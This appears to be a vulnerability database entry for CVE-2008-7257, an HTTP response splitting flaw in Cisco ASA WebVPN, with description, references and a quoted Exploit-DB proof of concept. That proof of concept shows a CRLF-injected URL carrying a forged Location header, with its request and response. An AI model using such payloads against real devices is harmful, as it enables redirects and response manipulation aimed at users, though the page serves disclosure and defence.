CVE-2008-7257
Description
CRLF injection vulnerability in +webvpn+/index.html in WebVPN on Cisco Adaptive Security Appliances (ASA) 5580 series devices with software before 8.1(2) allows remote attackers to inject arbitrary HTTP headers as demonstrated by a redirect attack involving a %0d%0aLocation%3a sequence in a URI, or conduct HTTP response splitting attacks via unspecified vectors, aka Bug ID CSCsr09163.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Cisco Adaptive Security Response - HTTP Response Splitting
source: https://www.securityfocus.com/bid/41159/info
Cisco Adaptive Security Response (ASA) is prone to an HTTP response-splitting vulnerability.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust.
Firmware versions prior to Cisco ASA 8.1(2) are vulnerable.
This issue is being tracked by Cisco Bugid CSCsr09163.
URL: http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom Request: GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0 Host: /www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Response: HTTP/1.0 301 Moved Permanently Server: Web Server Location: https:///www.example2.com/ Location: http:///www.example3.com Content-Type: text/html Content-Length: 125 References
- http://securitytracker.com/id?1024155
- http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html
- http://www.secureworks.com/ctu/advisories/SWRX-2010-001
- http://www.securityfocus.com/archive/1/512023/100/0/threaded
- http://www.securityfocus.com/bid/41159
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59850
- http://securitytracker.com/id?1024155
- http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html
- http://www.secureworks.com/ctu/advisories/SWRX-2010-001
- http://www.securityfocus.com/archive/1/512023/100/0/threaded
- http://www.securityfocus.com/bid/41159
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59850
CWEs
CWE-20
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.